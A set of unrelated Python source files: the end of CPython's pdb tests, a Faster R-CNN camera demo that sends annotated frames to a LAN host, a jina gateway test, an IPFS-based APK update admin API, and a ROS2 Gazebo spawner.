self.addCleanup(os_helper.unlink, 'bar.py')
stdout, stderr = self.run_pdb_script(script, commands)
self.assertTrue(
any('main.py(5)foo()->None' in l for l in stdout.splitlines()),
'Fail to step into the caller after a return')
def test_issue13120(self):
# Invoking "continue" on a non-main thread triggered an exception
# inside signal.signal.
with open(os_helper.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
def start_pdb():
pdb.Pdb(readrc=False).set_trace()
x = 1
y = 1
t = threading.Thread(target=start_pdb)
t.start()""").encode('ascii'))
cmd = [sys.executable, '-u', os_helper.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
env={**os.environ, 'PYTHONIOENCODING': 'utf-8'}
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\n')
self.assertNotIn(b'Error', stdout,
"Got an error running test script under PDB")
def test_issue36250(self):
with open(os_helper.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
evt = threading.Event()
def start_pdb():
evt.wait()
pdb.Pdb(readrc=False).set_trace()
t = threading.Thread(target=start_pdb)
t.start()
pdb.Pdb(readrc=False).set_trace()
evt.set()
t.join()""").encode('ascii'))
cmd = [sys.executable, '-u', os_helper.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
env = {**os.environ, 'PYTHONIOENCODING': 'utf-8'}
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\ncont\n')
self.assertNotIn(b'Error', stdout,
"Got an error running test script under PDB")
def test_issue16180(self):
# A syntax error in the debuggee.
script = "def f: pass\n"
commands = ''
expected = "SyntaxError:"
stdout, stderr = self.run_pdb_script(script, commands)
self.assertIn(expected, stdout,
'\n\nExpected:\n{}\nGot:\n{}\n'
'Fail to handle a syntax error in the debuggee.'
.format(expected, stdout))
def test_issue26053(self):
# run command of pdb prompt echoes the correct args
script = "print('hello')"
commands = """
continue
run a b c
run d e f
quit
"""
stdout, stderr = self.run_pdb_script(script, commands)
res = '\n'.join([x.strip() for x in stdout.splitlines()])
self.assertRegex(res, "Restarting .* with arguments:\na b c")
self.assertRegex(res, "Restarting .* with arguments:\nd e f")
def test_readrc_kwarg(self):
script = textwrap.dedent("""
import pdb; pdb.Pdb(readrc=False).set_trace()
print('hello')
""")
save_home = os.environ.pop('HOME', None)
try:
with os_helper.temp_cwd():
with open('.pdbrc', 'w') as f:
f.write("invalid\n")
with open('main.py', 'w') as f:
f.write(script)
cmd = [sys.executable, 'main.py']
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
)
with proc:
stdout, stderr = proc.communicate(b'q\n')
self.assertNotIn(b"NameError: name 'invalid' is not defined",
stdout)
finally:
if save_home is not None:
os.environ['HOME'] = save_home
def test_readrc_homedir(self):
save_home = os.environ.pop("HOME", None)
with os_helper.temp_dir() as temp_dir, patch("os.path.expanduser"):
rc_path = os.path.join(temp_dir, ".pdbrc")
os.path.expanduser.return_value = rc_path
try:
with open(rc_path, "w") as f:
f.write("invalid")
self.assertEqual(pdb.Pdb().rcLines[0], "invalid")
finally:
if save_home is not None:
os.environ["HOME"] = save_home
def test_read_pdbrc_with_ascii_encoding(self):
script = textwrap.dedent("""
import pdb; pdb.Pdb().set_trace()
print('hello')
""")
save_home = os.environ.pop('HOME', None)
try:
with os_helper.temp_cwd():
with open('.pdbrc', 'w', encoding='utf-8') as f:
f.write("Fran\u00E7ais")
with open('main.py', 'w', encoding='utf-8') as f:
f.write(script)
cmd = [sys.executable, 'main.py']
env = {'PYTHONIOENCODING': 'ascii'}
if sys.platform == 'win32':
env['PYTHONLEGACYWINDOWSSTDIO'] = 'non-empty-string'
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
env={**os.environ, **env}
)
with proc:
stdout, stderr = proc.communicate(b'c\n')
self.assertIn(b"UnicodeEncodeError: \'ascii\' codec can\'t encode character "
b"\'\\xe7\' in position 21: ordinal not in range(128)", stderr)
finally:
if save_home is not None:
os.environ['HOME'] = save_home
def test_header(self):
stdout = StringIO()
header = 'Nobody expects... blah, blah, blah'
with ExitStack() as resources:
resources.enter_context(patch('sys.stdout', stdout))
resources.enter_context(patch.object(pdb.Pdb, 'set_trace'))
pdb.set_trace(header=header)
self.assertEqual(stdout.getvalue(), header + '\n')
def test_run_module(self):
script = """print("SUCCESS")"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_module_is_run_as_main(self):
script = """
if __name__ == '__main__':
print("SUCCESS")
"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_breakpoint(self):
script = """
if __name__ == '__main__':
pass
print("SUCCESS")
pass
"""
commands = """
b 3
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("Breakpoint 1 at" in l for l in stdout.splitlines()), stdout)
self.assertTrue(all("SUCCESS" not in l for l in stdout.splitlines()), stdout)
def test_run_pdb_with_pdb(self):
commands = """
c
quit
"""
stdout, stderr = self._run_pdb(["-m", "pdb"], commands)
self.assertIn(
pdb._usage,
stdout.replace('\r', '') # remove \r for windows
)
def test_module_without_a_main(self):
module_name = 't_main'
os_helper.rmtree(module_name)
init_file = module_name + '/__init__.py'
os.mkdir(module_name)
with open(init_file, 'w') as f:
pass
self.addCleanup(os_helper.rmtree, module_name)
stdout, stderr = self._run_pdb(['-m', module_name], "")
self.assertIn("ImportError: No module named t_main.__main__",
stdout.splitlines())
def test_blocks_at_first_code_line(self):
script = """
#This is a comment, on line 2
print("SUCCESS")
"""
commands = """
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("__main__.py(4)<module>()"
in l for l in stdout.splitlines()), stdout)
def test_relative_imports(self):
self.module_name = 't_main'
os_helper.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(os_helper.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import top_var
from .module import var
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
var2 = "second var"
"""))
commands = """
b 5
c
p top_var
p var
p module.var2
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
self.assertTrue(any("VAR from top" in l for l in stdout.splitlines()))
self.assertTrue(any("second var" in l for l in stdout.splitlines()))
def test_relative_imports_on_plain_module(self):
# Validates running a plain module. See bpo32691
self.module_name = 't_main'
os_helper.rmtree(self.module_name)
main_file = self.module_name + '/runme.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(os_helper.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
"""))
commands = """
b 3
c
p module.var
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name + '.runme'], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
def test_errors_in_command(self):
commands = "\n".join([
'print(',
'debug print(',
'debug doesnotexist',
'c',
])
stdout, _ = self.run_pdb_script('pass', commands + '\n')
self.assertEqual(stdout.splitlines()[1:], [
'-> pass',
'(Pdb) *** SyntaxError: \'(\' was never closed',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'*** SyntaxError: \'(\' was never closed',
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'> <string>(1)<module>()',
"((Pdb)) *** NameError: name 'doesnotexist' is not defined",
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ',
])
def test_issue34266(self):
'''do_run handles exceptions from parsing its arg'''
def check(bad_arg, msg):
commands = "\n".join([
f'run {bad_arg}',
'q',
])
stdout, _ = self.run_pdb_script('pass', commands + '\n')
self.assertEqual(stdout.splitlines()[1:], [
'-> pass',
f'(Pdb) *** Cannot run {bad_arg}: {msg}',
'(Pdb) ',
])
check('\\', 'No escaped character')
check('"', 'No closing quotation')
def test_issue42384(self):
'''When running `python foo.py` sys.path[0] is an absolute path. `python -m pdb foo.py` should behave the same'''
script = textwrap.dedent("""
import sys
print('sys.path[0] is', sys.path[0])
""")
commands = 'c\nq'
with os_helper.temp_cwd() as cwd:
expected = f'(Pdb) sys.path[0] is {os.path.realpath(cwd)}'
stdout, stderr = self.run_pdb_script(script, commands)
self.assertEqual(stdout.split('\n')[2].rstrip('\r'), expected)
@os_helper.skip_unless_symlink
def test_issue42384_symlink(self):
'''When running `python foo.py` sys.path[0] resolves symlinks. `python -m pdb foo.py` should behave the same'''
script = textwrap.dedent("""
import sys
print('sys.path[0] is', sys.path[0])
""")
commands = 'c\nq'
with os_helper.temp_cwd() as cwd:
cwd = os.path.realpath(cwd)
dir_one = os.path.join(cwd, 'dir_one')
dir_two = os.path.join(cwd, 'dir_two')
expected = f'(Pdb) sys.path[0] is {dir_one}'
os.mkdir(dir_one)
with open(os.path.join(dir_one, 'foo.py'), 'w') as f:
f.write(script)
os.mkdir(dir_two)
os.symlink(os.path.join(dir_one, 'foo.py'), os.path.join(dir_two, 'foo.py'))
stdout, stderr = self._run_pdb([os.path.join('dir_two', 'foo.py')], commands)
self.assertEqual(stdout.split('\n')[2].rstrip('\r'), expected)
def test_issue42383(self):
with os_helper.temp_cwd() as cwd:
with open('foo.py', 'w') as f:
s = textwrap.dedent("""
print('The correct file was executed')
import os
os.chdir("subdir")
""")
f.write(s)
subdir = os.path.join(cwd, 'subdir')
os.mkdir(subdir)
os.mkdir(os.path.join(subdir, 'subdir'))
wrong_file = os.path.join(subdir, 'foo.py')
with open(wrong_file, 'w') as f:
f.write('print("The wrong file was executed")')
stdout, stderr = self._run_pdb(['foo.py'], 'c\nc\nq')
expected = '(Pdb) The correct file was executed'
self.assertEqual(stdout.split('\n')[6].rstrip('\r'), expected)
class ChecklineTests(unittest.TestCase):
def setUp(self):
linecache.clearcache() # Pdb.checkline() uses linecache.getline()
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test_checkline_before_debugging(self):
with open(os_helper.TESTFN, "w") as f:
f.write("print(123)")
db = pdb.Pdb()
self.assertEqual(db.checkline(os_helper.TESTFN, 1), 1)
def test_checkline_after_reset(self):
with open(os_helper.TESTFN, "w") as f:
f.write("print(123)")
db = pdb.Pdb()
db.reset()
self.assertEqual(db.checkline(os_helper.TESTFN, 1), 1)
def test_checkline_is_not_executable(self):
with open(os_helper.TESTFN, "w") as f:
# Test for comments, docstrings and empty lines
s = textwrap.dedent("""
# Comment
\"\"\" docstring \"\"\"
''' docstring '''
""")
f.write(s)
db = pdb.Pdb()
num_lines = len(s.splitlines()) + 2 # Test for EOF
for lineno in range(num_lines):
self.assertFalse(db.checkline(os_helper.TESTFN, lineno))
def load_tests(*args):
from test import test_pdb
suites = [
unittest.makeSuite(PdbTestCase),
unittest.makeSuite(ChecklineTests),
doctest.DocTestSuite(test_pdb)
]
return unittest.TestSuite(suites)
if __name__ == '__main__':
unittest.main()
|
client.py
|
#!/usr/bin/env python
import os
import sys
import argparse
import numpy as np
import cv2
import _init_paths
from fast_rcnn.config import cfg
from fast_rcnn.test import im_detect
from fast_rcnn.nms_wrapper import nms
from utils.timer import Timer
import caffe
import socket
from PIL import Image
from time import sleep
import threading
VOC_CLASSES = ('__background__',
'aeroplane', 'bicycle', 'bird', 'boat',
'bottle', 'bus', 'car', 'cat', 'chair',
'cow', 'diningtable', 'dog', 'horse',
'motorbike', 'person', 'pottedplant',
'sheep', 'sofa', 'train', 'tvmonitor')
COLORS = ((0,0,0),
(0,0,204), (0,102,204), (0,204,204), (0,204,0),
(204,204,0), (204,102,0), (204,0,0), (204,0,102),
(204,0,102), (102,0,204), (153,153,255), (153,204,255),
(153,255,255), (153,255,153), (255,255,153), (255,204,153),
(255,153,153), (255,153,204), (255,153,255), (204,153,255))
DEFAULT_PROTOTXT = 'models/pascal_voc/VGG16/faster_rcnn_end2end/test.prototxt'
DEFAULT_MODEL = 'data/faster_rcnn_models/VGG16_faster_rcnn_final.caffemodel'
windowName = 'FRCN-demo'
def vis_detections_cv(im, det_list, cls_list, thresh=0.5):
"""Draw detected bounding boxes."""
assert len(det_list) == len(cls_list)
for i in range(len(det_list)):
bbox = det_list[i][:4]
score = det_list[i][-1]
cls = cls_list[i]
cv2.rectangle(im, (bbox[0],bbox[1]), (bbox[2],bbox[3]), COLORS[cls], 2)
txt = '{:s} {:.2f}'.format(VOC_CLASSES[cls], score)
cv2.putText(im, txt, (int(bbox[0])+1,int(bbox[1])-2), cv2.FONT_HERSHEY_PLAIN, 1.0, (32,32,32), 4, cv2.LINE_AA)
cv2.putText(im, txt, (int(bbox[0]),int(bbox[1])-2), cv2.FONT_HERSHEY_PLAIN, 1.0, (240,240,240), 1, cv2.LINE_AA)
return im
def demo(net, im):
"""Detect object classes in an image using pre-computed object proposals."""
timer = Timer()
timer.tic()
scores, boxes = im_detect(net, im)
timer.toc()
det_list = [] # list of final detection boxes and scores
cls_list = [] # list of detection class
CONF_THRESH = 0.8
NMS_THRESH = 0.1
for cls_ind, cls in enumerate(VOC_CLASSES[1:]):
cls_ind += 1 # because we skipped background
cls_boxes = boxes[:, 4*cls_ind:4*(cls_ind + 1)]
cls_scores = scores[:, cls_ind]
dets = np.hstack((cls_boxes,
cls_scores[:, np.newaxis])).astype(np.float32)
keep = nms(dets, NMS_THRESH)
dets = dets[keep, :]
inds = np.where(dets[:, -1] >= CONF_THRESH)[0]
for i in inds:
det_list.append(dets[i])
cls_list.extend([cls_ind] * len(inds))
print('Detection took {:.3f}s and found {:d} objects'.format(timer.total_time, len(det_list)))
return vis_detections_cv(im, det_list, cls_list, thresh=CONF_THRESH)
def parse_args():
"""Parse input arguments."""
parser = argparse.ArgumentParser(description='Faster RCNN demo with camera')
parser.add_argument('--gpu', dest='gpu_id', help='GPU device id to use [0]',
default=0, type=int)
parser.add_argument('--cpu', dest='cpu_mode',
help='Use CPU mode (overrides --gpu)',
action='store_true')
parser.add_argument('--rtsp', dest='use_rtsp',
help='use IP CAM (remember to also set --uri)',
action='store_true')
parser.add_argument('--uri', dest='rtsp_uri',
help='RTSP URI string, e.g. rtsp://192.168.1.64:554',
default=None, type=str)
parser.add_argument('--latency', dest='rtsp_latency',
help='latency in ms for RTSP [200]',
default=200, type=int)
parser.add_argument('--usb', dest='use_usb',
help='use USB webcam (remember to also set --vid)',
action='store_true')
parser.add_argument('--vid', dest='video_dev',
help='video device # of USB webcam (/dev/video?) [1]',
default=1, type=int)
parser.add_argument('--width', dest='image_width',
help='image width [640]',
default=640, type=int)
parser.add_argument('--height', dest='image_height',
help='image height [480]',
default=480, type=int)
parser.add_argument('--prototxt', dest='caffe_prototxt',
help='caffe prototxt of the Faster RCNN model [{}]'.format(DEFAULT_PROTOTXT),
default=DEFAULT_PROTOTXT, type=str)
parser.add_argument('--model', dest='caffe_model',
help='the caffemodel (weights) file [{}]'.format(DEFAULT_MODEL),
default=DEFAULT_MODEL, type=str)
args = parser.parse_args()
return args
def open_cam_rtsp(uri, width, height, latency):
gst_str = ('rtspsrc location={} latency={} ! rtph264depay ! h264parse ! omxh264dec ! nvvidconv ! video/x-raw, width=(int){}, height=(int){}, format=(string)BGRx ! videoconvert ! appsink').format(uri, latency, width, height)
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
def open_cam_usb(dev, width, height):
# We want to set width and height here, otherwise we could just do:
# return cv2.VideoCapture(dev)
gst_str = 'v4l2src device=/dev/video{} ! video/x-raw, width=(int){}, height=(int){}, format=(string)RGB ! videoconvert ! appsink'.format(dev, width, height)
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
def open_cam_onboard(width, height):
# On L4T versions prior to 28.1, add 'flip-method=2' to the nvvidconv element in gst_str below
# Use Jetson onboard camera
gst_str = 'nvcamerasrc ! video/x-raw(memory:NVMM), width=(int)1920, height=(int)1080, format=(string)I420, framerate=(fraction)30/1 ! nvvidconv ! video/x-raw, width=(int){}, height=(int){}, format=(string)BGRx ! videoconvert ! appsink'.format(width, height)
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
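# Note on the three open_cam_* helpers above: each builds a GStreamer pipeline
# string ending in `appsink`, which is what lets cv2.VideoCapture (built with
# GStreamer support) pull decoded frames. The RTSP pipeline decodes H.264 with
# the Jetson's omxh264dec, the USB pipeline reads raw RGB from v4l2, and the
# onboard pipeline captures 1920x1080 from nvcamerasrc and scales it to the
# requested width/height via nvvidconv.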
def open_window(width, height):
cv2.namedWindow(windowName, cv2.WINDOW_AUTOSIZE)
cv2.resizeWindow(windowName, width, height)
#cv2.moveWindow(windowName, 0, 0)
cv2.setWindowTitle(windowName, 'Faster RCNN camera demo')
def transmit():
s = socket.socket()
s.connect(("192.168.1.124",9090))
f = open("/home/nvidia/project/py-faster-rcnn/1.jpg", "rb")
l = f.read(1024)
while l:
s.send(l)
l = f.read(1024)
f.close()
s.close()
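# A minimal sketch (not part of the original script) of the receiver that
# transmit() assumes is listening on 192.168.1.124:9090: it accepts a single
# connection and writes the streamed bytes to disk. The host, port and output
# path below are illustrative assumptions; the function is never called here.
def receive_file_sketch(host="0.0.0.0", port=9090, out_path="received.jpg"):
    srv = socket.socket()
    srv.bind((host, port))
    srv.listen(1)
    conn, _ = srv.accept()           # wait for transmit() to connect
    with open(out_path, "wb") as out:
        while True:
            chunk = conn.recv(1024)  # same 1 KiB chunk size as the sender
            if not chunk:            # empty read means the sender closed
                break
            out.write(chunk)
    conn.close()
    srv.close()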
if __name__ == '__main__':
cfg.TEST.HAS_RPN = True # Use RPN for proposals
args = parse_args()
if not os.path.isfile(args.caffe_prototxt):
sys.exit('{} not found!'.format(args.caffe_prototxt))
if not os.path.isfile(args.caffe_model):
sys.exit('{} not found!'.format(args.caffe_model))
if args.cpu_mode:
caffe.set_mode_cpu()
else:
caffe.set_mode_gpu()
caffe.set_device(args.gpu_id)
cfg.GPU_ID = args.gpu_id
net = caffe.Net(args.caffe_prototxt, args.caffe_model, caffe.TEST)
# Warm-up with 2 dummy images
im = 128 * np.ones((640, 480, 3), dtype=np.uint8)
for _ in range(2):
_, _= im_detect(net, im)
if args.use_rtsp:
cap = open_cam_rtsp(args.rtsp_uri, args.image_width, args.image_height, args.rtsp_latency)
elif args.use_usb:
cap = open_cam_usb(args.video_dev, args.image_width, args.image_height)
else: # by default, use the Jetson onboard camera
cap = open_cam_onboard(args.image_width, args.image_height)
if not cap.isOpened():
sys.exit('Failed to open camera!')
open_window(args.image_width, args.image_height)
while True:
if cv2.getWindowProperty(windowName, 0) < 0: break # display window terminated by user
ret_val, img = cap.read()
if not ret_val: break # image capture failed
img = demo(net, img)
cv2.imshow(windowName, img)
im = Image.fromarray(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
im.save('1.jpg')
t = threading.Thread(target=transmit)
t.start()
t.join()
key = cv2.waitKey(1)
if key == 27: break # ESC key pressed
cap.release()
cv2.destroyAllWindows()
|
test_gateway_dry_run.py
|
import multiprocessing
import pytest
from jina import Client
from jina.parsers import set_gateway_parser, set_pod_parser
from jina.serve.runtimes.asyncio import AsyncNewLoopRuntime
from jina.serve.runtimes.gateway.grpc import GRPCGatewayRuntime
from jina.serve.runtimes.gateway.http import HTTPGatewayRuntime
from jina.serve.runtimes.gateway.websocket import WebSocketGatewayRuntime
from jina.serve.runtimes.worker import WorkerRuntime
def _create_worker_runtime(port, name='', executor=None):
args = set_pod_parser().parse_args([])
args.port = port
args.name = name
if executor:
args.uses = executor
with WorkerRuntime(args) as runtime:
runtime.run_forever()
def _create_gateway_runtime(graph_description, pod_addresses, port, protocol='grpc'):
if protocol == 'http':
gateway_runtime = HTTPGatewayRuntime
elif protocol == 'websocket':
gateway_runtime = WebSocketGatewayRuntime
else:
gateway_runtime = GRPCGatewayRuntime
with gateway_runtime(
set_gateway_parser().parse_args(
[
'--graph-description',
graph_description,
'--deployments-addresses',
pod_addresses,
'--port',
str(port),
]
)
) as runtime:
runtime.run_forever()
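# The test below wires a single worker pod into a gateway: graph_description
# maps the gateway entry/exit points onto pod names ("start-gateway" -> pod0 ->
# "end-gateway"), and pod_addresses maps each pod name to the host:port list
# the gateway should route requests to.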
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_dry_run_of_flow(port_generator, protocol):
worker_port = port_generator()
port = port_generator()
graph_description = '{"start-gateway": ["pod0"], "pod0": ["end-gateway"]}'
pod_addresses = f'{{"pod0": ["0.0.0.0:{worker_port}"]}}'
# create a single worker runtime
worker_process = multiprocessing.Process(
target=_create_worker_runtime, args=(worker_port,)
)
worker_process.start()
# create a single gateway runtime
gateway_process = multiprocessing.Process(
target=_create_gateway_runtime,
args=(graph_description, pod_addresses, port, protocol),
)
gateway_process.start()
AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
timeout=5.0,
ctrl_address=f'0.0.0.0:{worker_port}',
ready_or_shutdown_event=multiprocessing.Event(),
)
AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
timeout=5.0,
ctrl_address=f'0.0.0.0:{port}',
ready_or_shutdown_event=multiprocessing.Event(),
)
# send requests to the gateway
c = Client(host='localhost', port=port, asyncio=True, protocol=protocol)
dry_run_alive = c.dry_run()
worker_process.terminate()
worker_process.join()
dry_run_worker_removed = c.dry_run()
gateway_process.terminate()
gateway_process.join()
assert dry_run_alive
assert not dry_run_worker_removed
assert gateway_process.exitcode == 0
assert worker_process.exitcode == 0
|
admin-api.py
|
#!/usr/bin/python3
import json
import os
import time
import ipfshttpclient
import redis
from fastapi import FastAPI, File, UploadFile, Form
def loadjson(jsonfile):
with open(jsonfile) as json_file:
data = json.load(json_file)
return data
app = FastAPI()
conf = loadjson(os.path.join(os.path.dirname(os.path.abspath(__file__)), "config.json"))
api = ipfshttpclient.connect(conf['ipfsApi'], timeout=3600)
def getupdatejson(hash):
stat = api.files.stat('/ipfs/' + hash)
if not stat['Type'] == 'directory':
return 'ERR: hash is not a directory.'
file = api.object.links('/ipfs/' + hash)
for fl in file['Links']:
if fl['Name'] == 'update.json':
return json.loads(api.cat(fl['Hash']))
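# publish() caches the new ipns -> ipfs mapping in the configured Redis cache
# servers and performs the (potentially slow) IPNS name publish on a separate
# thread, so the HTTP handlers that call it are not blocked for the full
# publish duration.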
def publish(ipns, ipfs):
from threading import Thread
def setipns(ipns, ipfs):
api.name.publish('/ipfs/%s' % ipfs, key=ipns, lifetime='8760h')
redcfs = conf['redisCacheServer']
for redcf in redcfs:
red = redis.Redis(host=redcf["host"], port=redcf["port"], decode_responses=True)
red.set(ipns, ipfs)
t = Thread(target=setipns, args=(ipns, ipfs))
t.start()
return
@app.get('/getkeys')
def getKeys():
keys = api.key.list()
result = []
for k in keys['Keys']:
if k['Name'].startswith(conf['storageSubPath'] + '_'):
result.append(k)
return {"api": conf['ipfsApi'], "gw": conf['ipfsGW'], "keys": result}
@app.get('/newkey')
def newKey(keyname: str):
if not keyname.isalnum():
return 'keyname not allowed.'
keys = api.key.list()
for k in keys['Keys']:
if k['Name'] == conf['storageSubPath'] + '_' + keyname:
return 'keyname already exists.'
key = api.key.gen(conf['storageSubPath'] + '_' + keyname, type="rsa")
return key
@app.get('/getupdate')
def getUpdate(ipns: str):
red = redis.Redis(host=conf['redisCacheServer'][0]["host"],
port=conf['redisCacheServer'][0]["port"],
decode_responses=True)
ipfs = red.get(ipns)
if ipfs is None:
update = {
"title": conf['projectName'],
"data": [],
}
return update
else:
result = getupdatejson(ipfs)
result['ipfs'] = ipfs
return result
@app.post('/newversion')
def newVersion(ipns: str = Form(...),
title: str = Form(...),
version:str = Form(...),
build:str = Form(...),
log:str = Form(...),
apk: UploadFile = File(...)):
apkname = "%s_%s_%s.apk" % (conf['projectName'].lower(), version, build)
apkpath = os.path.join(conf['localStorage'], conf['storageSubPath'])
if not os.path.isdir(apkpath):
os.mkdir(apkpath)
with open(os.path.join(apkpath, apkname), "wb") as f:
f.write(apk.file.read())
apkhash = api.add(os.path.join(apkpath, apkname))
red = redis.Redis(host=conf['redisCacheServer'][0]["host"],
port=conf['redisCacheServer'][0]["port"],
decode_responses=True)
ipfs = red.get(ipns)
if ipfs is None:
update = {
"title": conf['projectName'],
"data": [],
}
ipfs = conf['uiTemplate']
else:
update = getupdatejson(ipfs)
update['data'].append({
"title": title,
"version": version,
"build": build,
"log": log,
"apk_file": os.path.join(conf['storageSubPath'], apkname),
"datetime": int(time.time())
})
update['last'] = build
updatehash = api.add_json(update)
files = api.object.links(ipfs)
dirhash = api.object.new("unixfs-dir")
for fl in files['Links']:
if fl['Name'] == conf['storageSubPath']:
dirhash = fl
# add apk file in hash
dirhash = api.object.patch.add_link(dirhash['Hash'], apkname, apkhash['Hash'])
hash = conf['uiTemplate']
hash = api.object.patch.add_link(hash, conf['storageSubPath'], dirhash['Hash'])
hash = api.object.patch.add_link(hash['Hash'], 'update.json', updatehash)
publish(ipns, hash['Hash'])
return {"newhash": hash['Hash']}
@app.get('/delversion')
def delVersion(ipns, build):
red = redis.Redis(host=conf['redisCacheServer'][0]["host"],
port=conf['redisCacheServer'][0]["port"],
decode_responses=True)
ipfs = red.get(ipns)
if ipfs is None:
return 'no Version.'
update = getupdatejson(ipfs)
newupdate = {
"title": conf['projectName'],
"data": [],
}
for item in update['data']:
if not item['build'] == build:
newupdate['data'].append(item)
else:
apkname = "%s_%s_%s.apk" % (conf['projectName'].lower(), item['version'], build)
if update['last'] == build:
last = 0
for i in range(len(newupdate['data'])):
if newupdate['data'][i]['datetime'] > newupdate['data'][last]['datetime']:
last = i
newupdate['last'] = newupdate['data'][last]['build']
else:
newupdate['last'] = update['last']
updatehash = api.add_json(newupdate)
files = api.object.links(ipfs)
dirhash = api.object.new("unixfs-dir")
for fl in files['Links']:
if fl['Name'] == conf['storageSubPath']:
dirhash = fl
# del apk file in hash
dirhash = api.object.patch.rm_link(dirhash['Hash'], apkname)
hash = conf['uiTemplate']
hash = api.object.patch.add_link(hash, conf['storageSubPath'], dirhash['Hash'])
hash = api.object.patch.add_link(hash['Hash'], 'update.json', updatehash)
publish(ipns, hash['Hash'])
return {"newhash": hash['Hash']}
@app.post('/upversion')
def upVersion(ipns: str = Form(...),
title: str = Form(...),
version:str = Form(...),
build:str = Form(...),
log:str = Form(...),
apk: UploadFile = File(None)):
red = redis.Redis(host=conf['redisCacheServer'][0]["host"],
port=conf['redisCacheServer'][0]["port"],
decode_responses=True)
ipfs = red.get(ipns)
if ipfs is None:
return 'no Version.'
files = api.object.links(ipfs)
dirhash = api.object.new("unixfs-dir")
for fl in files['Links']:
if fl['Name'] == conf['storageSubPath']:
dirhash = fl
if apk:
apkname = "%s_%s_%s.apk" % (conf['projectName'].lower(), version, build)
apkpath = os.path.join(conf['localStorage'], conf['storageSubPath'])
if not os.path.isdir(apkpath):
os.mkdir(apkpath)
with open(os.path.join(apkpath, apkname), "wb") as f:
f.write(apk.file.read())
apkhash = api.add(os.path.join(apkpath, apkname))
update = getupdatejson(ipfs)
newupdate = {
"title": conf['projectName'],
"data": [],
}
for item in update['data']:
if not item['build'] == build:
newupdate['data'].append(item)
else:
if apk:
apk_file = os.path.join(conf['storageSubPath'], apkname)
dirhash = api.object.patch.rm_link(dirhash['Hash'], item['apk_file'].split('/')[1])
dirhash = api.object.patch.add_link(dirhash['Hash'], apkname, apkhash['Hash'])
else:
apk_file = item['apk_file']
newupdate['data'].append({
"title": title,
"version": version,
"build": build,
"log": log,
"apk_file": apk_file,
"datetime": int(time.time())
})
newupdate['last'] = build
updatehash = api.add_json(newupdate)
hash = conf['uiTemplate']
hash = api.object.patch.add_link(hash, conf['storageSubPath'], dirhash['Hash'])
hash = api.object.patch.add_link(hash['Hash'], 'update.json', updatehash)
publish(ipns, hash['Hash'])
return {"newhash": hash['Hash']}
if __name__ == '__main__':
import uvicorn
runConf = conf['service']
uvicorn.run(app=app,
host=runConf['host'],
port=runConf['port'],
workers=runConf['workers'])
|
spawn_object.py
|
# taken from https://zmk5.github.io/general/demo/2019/07/15/ros2-spawning-entity.html
import rclpy
from multiprocessing import Process
from gazebo_msgs.srv import SpawnEntity
def spawn_object(model):
rclpy.init()
node = rclpy.create_node("entity_spawner")
node.get_logger().info(
'Creating Service client to connect to `/spawn_entity`')
client = node.create_client(SpawnEntity, "/spawn_entity")
node.get_logger().info("Connecting to `/spawn_entity` service...")
if not client.service_is_ready():
client.wait_for_service()
node.get_logger().info("...connected!")
request = SpawnEntity.Request()
request.name = model[0]
with open(model[1], 'r') as sdf_file:
    request.xml = sdf_file.read()
request.robot_namespace = "spawned_object"
request.initial_pose.position.x, request.initial_pose.position.y, request.initial_pose.position.z = model[2]
node.get_logger().info("Sending service request to `/spawn_entity`")
future = client.call_async(request)
rclpy.spin_until_future_complete(node, future)
if future.result() is not None:
print('response: %r' % future.result())
else:
raise RuntimeError(
'exception while calling service: %r' % future.exception())
node.get_logger().info("Done! Shutting down node.")
node.destroy_node()
rclpy.shutdown()
